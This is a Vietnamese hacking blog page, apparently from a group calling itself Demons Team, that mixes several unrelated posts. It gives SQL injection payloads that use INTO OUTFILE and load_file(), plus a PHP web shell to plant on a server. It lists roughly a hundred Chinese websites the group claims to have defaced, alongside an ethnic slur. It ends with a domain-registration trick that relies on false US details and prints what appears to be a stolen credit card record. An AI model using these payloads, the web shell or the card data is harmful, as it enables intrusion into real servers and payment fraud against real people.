Thông thường bạn có thể ghi files lên tất cả các thư mục mà Mysql server có quyền ghi lên, miễn là bạn có quyền FILE.
Tuy nhiên Admin có thể giới hạn các thư mục có thể ghi được từ public.
Xem thêm tại http://dev.mysql.com/doc/refman/5.1/...s-options.html
3. Tạo ra các file hữu dụng
Khi bạn đã chắc chắn có quyền FILE và xác định được thư mục để ghi file, bạn có thể tiến hành ghi bằng câu lệnh SQL
Code:
0′ UNION SELECT columnname,null FROM tablename INTO OUTFILE ‘../../web/dir/file.txt
Code:
1′ OR 1=1 INTO OUTFILE ‘../../web/dir/file.txt
Cũng có thể kết hợp giữa load_file() để đọc các file trên server
Code:
0′ AND 1=0 UNION SELECT load_file(’…’) INTO OUTFILE ‘…
Code:
0′ AND 1=0 UNION SELECT hex(load_file(’…’)) INTO OUTFILE ‘…
Code:
0′ AND 1=0 UNION SELECT ‘code’,null INTO
OUTFILE ‘../../web/server/dir/file.php
Code:
// PHP SHELL
<? system($_GET['c']); ?>
Code:
// webserver info
<? phpinfo(); ?>
// SQL QUERY
<? ... $result = mysql_query($_GET['query']); … ?>
-Không thể overwrite file với câu lệnh này
-INTO OUTFILE phải là mệnh đề cuối cùng trong câu truy vấn
-Tôi không biết cách nào để mã hóa FILENAME trong INTO OUTFILE(‘FILENAME‘) chặn ‘ thì
không khai thác được, biết cách khai thác vui lòng PM
-có thể mã hóa code bạn muốn ghi vào file bằng lệnh char()
List site khựa checked sáng nay ngày 09/12/2012
Bị hack bởi members KunGa thuộc nhóm Demons Team
http://www.zhihuifa.net.cn/index.html
http://www.luteli.com.cn/index.html
http://qiufa.qiuti.com.cn/index.html
http://www.dujialong.cn/index.html
http://dianzhanfa.tiaojiefa.cc/index.html
http://laliantou.3w4.net.cn/index.html
http://kaiguan.qiuti.com.cn/index.html
http://qidongfamen.3w4.net.cn/index.html
http://2winvalve.com/index.html
http://www.0577hzp.cn/index.html
http://www.wzanbo.com/index.html
http://xilaigao.com/index.html
http://www.kaixite.cn/index.html
http://jiangyefa.com.cn/index.html
http://shiyanshipeijian.syspj.net/index.html
http://www.kongzhifa.com.cn/index.html
http://www.sibengfei.com.cn/index.html
http://fengtiao.3w4.net.cn/index.html
http://www.lanqiuji.com/index.html
http://www.wzdssl.com/index.html
http://www.laliji.net.cn/index.html
http://www.diandongtiaojiefa.net/index.html
http://mtmrmf.com/index.html
http://www.qiu-fa.com/index.html
http://www.jiezhifa.cn/index.html
http://haiwan.youbeng.org.cn/index.html
http://www.demanlai.cn/index.html
http://www.dianchiche.com/index.html
http://www.dijiaer.cn/index.html
http://www.616v.cn/index.html
http://syspj.net/index.html
http://86198330.com/index.html
http://www.xiehuifa.cn/index.html
http://buxiugangqiufa.com/index.html
http://yutong8.com/index.html
http://www.nijiangfa.com/index.html
http://www.shuilikongzhifa.com.cn/index.html
http://www.toysw.cn/index.html
http://trampoline.com.cn/index.html
http://demanlai.com/index.html
http://www.qiangbikaiguan.net/index.html
http://www.zjseals.com/index.html
http://luteli.com/index.html
http://www.maqiduo.com/index.html
http://www.paperpost.com.cn/index.html
http://www.fengtiao.cn/index.html
http://www.70-8.cn/index.html
http://www.qiufa.net.cn/index.html
http://yjdfay.com/index.html
http://guanlifa.com/index.html
http://www.tianyatea.net/index.html
http://www.laoshuji.cn/index.html
http://www.zhihuifa.net.cn/index.html
http://www.luteli.com.cn/index.html
http://qiufa.qiuti.com.cn/index.html
http://www.dujialong.cn/index.html
http://dianzhanfa.tiaojiefa.cc/index.html
http://laliantou.3w4.net.cn/index.html
http://kaiguan.qiuti.com.cn/index.html
http://qidongfamen.3w4.net.cn/index.html
http://2winvalve.com/index.html
http://www.0577hzp.cn/index.html
http://www.wzanbo.com/index.html
http://xilaigao.com/index.html
http://www.kaixite.cn/index.html
http://jiangyefa.com.cn/index.html
http://shiyanshipeijian.syspj.net/index.html
http://www.kongzhifa.com.cn/index.html
http://www.sibengfei.com.cn/index.html
http://fengtiao.3w4.net.cn/index.html
http://www.lanqiuji.com/index.html
http://www.wzdssl.com/index.html
http://www.laliji.net.cn/index.html
http://www.diandongtiaojiefa.net/index.html
http://mtmrmf.com/index.html
http://www.qiu-fa.com/index.html
http://www.jiezhifa.cn/index.html
http://www.cnfeiyao.com/index.html
http://haiyangqiu.com/index.html
http://www.58gd.cn/index.html
http://xintong-valve.com/index.html
http://www.wzluyi.com/index.html
http://www.huatai1988.com/index.html
http://zuhehuati.com/index.html
http://qidongqiufa.com/index.html
http://www.jixiangtoys.com.cn/index.html
http://www.guamianji.cn/index.html
http://www.hht.cc/index.html
http://jbglasses.com/index.html
http://hqvalve.com/index.html
http://www.risingvalve.com/index.html
http://chunxichina.com/index.html
http://www.jiangyefa.cn/index.html
http://www.ceshiyi.org.cn/index.html
http://wcwwc.com/index.html
http://taikonghuan.com/index.html
http://www.lvxiangcn.com/index.html
china là CLGT
china ăn
![]()
Miễn phí tên miền .me 1 năm
Cụ thể là đây
Ai ko đọc đc tiếng anh thì đọc ở dưới :
down cái này về
cài vào rồi tạo 1 email ở trong đó
chọn domain .me, order. Nhớ ghi info US để đc free.
Muốn xem tut thì đây:
BONUS:
Không có info US thì thử cái này:
4313070123731652 | 1 | 2013 | 923 | Benjamin Kramer | 1705 Purdy
Street Apt MG | Bronx | NY | 10462 | United States | 9174993591 |
Đăng ký:
Bài đăng (Atom)